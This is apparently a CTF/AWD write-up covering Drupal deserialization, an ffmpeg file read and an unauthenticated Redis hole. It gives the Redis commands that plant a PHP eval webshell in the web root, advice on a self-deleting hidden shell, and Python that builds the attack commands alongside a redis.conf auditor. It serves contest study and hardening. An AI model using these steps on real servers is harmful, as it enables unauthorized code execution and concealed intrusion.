<a href="{#$QISHI.site_dir#}link/add_link.php" target="_blank" class="f-right underline">申请>></a>
</div>
<div class="friendly-link">
{#qishi_link set="列表名:link,显示数目:100,调用名称:QS_index,类型:1"#}
{#foreach from=$link item=list#}
<a href="{#$list.link_url#}" target="_blank" class="underline">{#$list.title#}</a>
{#/foreach#}
</div>
{#qishi_link set="列表名:imglink,显示数目:14,调用名称:QS_index,类型:2"#}
{#if $imglink#}
<div class="link_img">
{#foreach from=$imglink item=list#}
<div class="l_img"><a href="{#$list.link_url#}" target="_blank"><img src="{#$list.link_logo#}" /></a> </div>
{#/foreach#}
<div class="clear"></div>
</div>
{#/if#}
</div>
<!-- 列表-友情链接结束 -->
</div>
<!-- 主体结束 -->
{#include file="footer.htm"#}
</body>
</html>
Challenge 3: easyCMS
- This one also had directory listings exposed by server misconfiguration
- Entering the templates/admin directory, the page title turned out to be a flag
- No more ideas on this one, Orz... hoping the big shots can explain it...
The afternoon AWD was, as expected, another web challenge
But around this one web challenge the organizers exposed three services: an HTTP service on port 80, a Python-served HTTP service on port 8888, and a redis service on port 6379. Each of the three had one hole (learned from the organizers after the match). According to the pre-match announcement, getting the flag meant running the getkey program under /usr/tmp, which prints the flag, but after the match the challenge author said there was in fact another place holding the flag in plaintext......
- First, port 80: a Drupal deserialization vulnerability, link https://paper.seebug.org/334/?spm=5176.app55885.3.2.XT8Apf Defense: change the admin password promptly
- Next, port 8888: an ffmpeg arbitrary file read. Emmm, honestly I did not know what it was for... but later I asked the challenge author, and he said he had not thought of using it this way either: the server also had a virtual disk mounted that contained the plaintext flag, so this could read it directly.... // Personally, though, I think this hole... basically cannot be patched at all, there is no permission for that... so emmmmm, everyone should get the idea. Defense: thinking about it afterwards... you could script endless requests to del to delete it, but that is a race, because the operator box and the attackers' boxes sit on the same flat network, so if the other side scripts its requests too you will not necessarily win..
- Lastly, the redis service on port 6379, which is the hole I used to attack... and I did something dumb again this afternoon. ps aux showed redis, so I happily connected and found no password was needed; the info command showed the config file at /var/lib/redis/6379/xxx. Looking at my own config file, several commands had been renamed or removed, migrate and flushdb for instance; config had been renamed to ccccooonnnnfig and shutdown to shutdown_123. So I set my own password and, thinking myself clever, went and took down most people's redis, expecting to rake in points happily...... and then suddenly realized this AWD had no checker!!!! Collapse, Orz... Later I found some people had even taken down their own port 80 service (no idea how, since without privilege escalation there is no permission for that). In fact redis here gives arbitrary file write, because redis runs as root, and redis has a save feature that dumps its own key-value pairs to a file, which means I can run the following commands to write a shell:
> ccccooonnnnfig set dir /var/www/html/drupal8/
> ccccooonnnnfig set dbfilename Pr0ph3t.php
> set Pr0ph3t "<?php @eval($_POST['yoooooo']); ?>"
> save
After save runs, redis creates a file Pr0ph3t.php in the port-80 web root whose content carries the Redis dump header around the payload; from there a reverse shell and so on, running as the daemon user. Here I recommend an undying shell (不死马) that unlinks itself, so it is not obvious the shell was written through Redis. Defense: enable the redis password with the following command
> ccccooonnnnfig set requirepass 你的密码
This takes effect immediately, without restarting the service.
Reference: https://www.leavesongs.com/penetration/write-webshell-via-redis-server.html
Closing word: as for the experience at this competition... everyone knows how it was... I will say no more....
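The four-command sequence above, plus the defence that follows it, as an added example in Python (not code from the writeup, from redis, or from the contest image). Redis commands travel over plain TCP as RESP arrays of bulk strings, so resp_encode() below yields exactly the bytes redis-cli would send for each line of the sequence, write_shell_commands() lines the four up in order, and audit_redis_conf() flags the settings in a redis.conf that let the trick work: missing requirepass, unrestricted bind, protected-mode off, and CONFIG merely renamed instead of disabled. The renamed command ccccooonnnnfig, the web root, file and key names are the writeup's; both conf texts are constructed for the example, and the password in the hardened one is a placeholder.

```python
"""Added example, not from the writeup, redis, or the contest image.

Redis commands are RESP arrays of bulk strings over plain TCP, which is why
no client library is needed to replay the write-shell sequence.  The renamed
command ccccooonnnnfig, web root, file and key names are the writeup's; the
conf texts below are constructed for the example.
"""


def resp_encode(*parts):
    """Encode one command as a RESP array of bulk strings (bytes)."""
    out = [b"*%d\r\n" % len(parts)]
    for part in parts:
        raw = part if isinstance(part, bytes) else str(part).encode()
        out.append(b"$%d\r\n%s\r\n" % (len(raw), raw))
    return b"".join(out)


def write_shell_commands(config_cmd, webroot, filename, key, payload):
    """The four commands from the writeup, in order, ready to send."""
    return [
        resp_encode(config_cmd, "set", "dir", webroot),          # where save() writes
        resp_encode(config_cmd, "set", "dbfilename", filename),  # what the dump is called
        resp_encode("set", key, payload),                        # payload stored in the dump
        resp_encode("save"),                                     # write dir/dbfilename
    ]


WEAK_CONF = """\
# constructed sample mirroring the contest image as the writeup describes it
port 6379
bind 0.0.0.0
protected-mode no
dir /var/lib/redis/6379
rename-command CONFIG ccccooonnnnfig
rename-command SHUTDOWN shutdown_123
rename-command FLUSHDB ""
"""

HARDENED_CONF = """\
# constructed sample: the same file with the holes closed
port 6379
bind 127.0.0.1
protected-mode yes
requirepass use-a-long-random-secret-here
dir /var/lib/redis/6379
rename-command CONFIG ""
rename-command FLUSHDB ""
"""


def parse_redis_conf(text):
    """Return (settings, renamed) from redis.conf text; "" means disabled."""
    settings, renamed = {}, {}
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        key, _, val = line.partition(" ")
        if key.lower() == "rename-command":
            orig, new = val.split()
            renamed[orig.upper()] = new.strip('"')
        else:
            settings[key.lower()] = val.strip()
    return settings, renamed


def audit_redis_conf(text):
    """List the settings that make the CONFIG SET dir/dbfilename trick possible."""
    settings, renamed = parse_redis_conf(text)
    findings = []
    if not settings.get("requirepass"):
        findings.append("no requirepass: anyone who can reach the port is admin")
    bind = settings.get("bind", "")
    if not bind or "0.0.0.0" in bind:
        findings.append("bind unrestricted: the port is reachable from other hosts")
    if settings.get("protected-mode", "yes").lower() != "yes":
        findings.append("protected-mode no: unauthenticated remote access allowed")
    config_name = renamed.get("CONFIG")
    if config_name is None:
        findings.append("CONFIG available under its default name")
    elif config_name:
        findings.append("CONFIG only renamed to %s: every team runs the same "
                        "image, so the new name is no secret" % config_name)
    return findings


if __name__ == "__main__":
    for cmd in write_shell_commands("ccccooonnnnfig", "/var/www/html/drupal8/",
                                    "Pr0ph3t.php", "Pr0ph3t",
                                    "<?php @eval($_POST['yoooooo']); ?>"):
        print(cmd)
    print(audit_redis_conf(WEAK_CONF))
    print(audit_redis_conf(HARDENED_CONF))
```

The dump that save produces starts with the REDIS magic and is mostly binary, but PHP emits bytes outside `<?php ... ?>` verbatim and executes the tag it finds, which is why the garbage around the payload does not matter. On the defence side, requirepass alone (the writeup's fix) stops the unauthenticated case; renaming CONFIG only helps when the name is actually secret, which in a shared AWD image it is not, so `rename-command CONFIG ""` and a loopback bind are the settings that remove the write primitive outright.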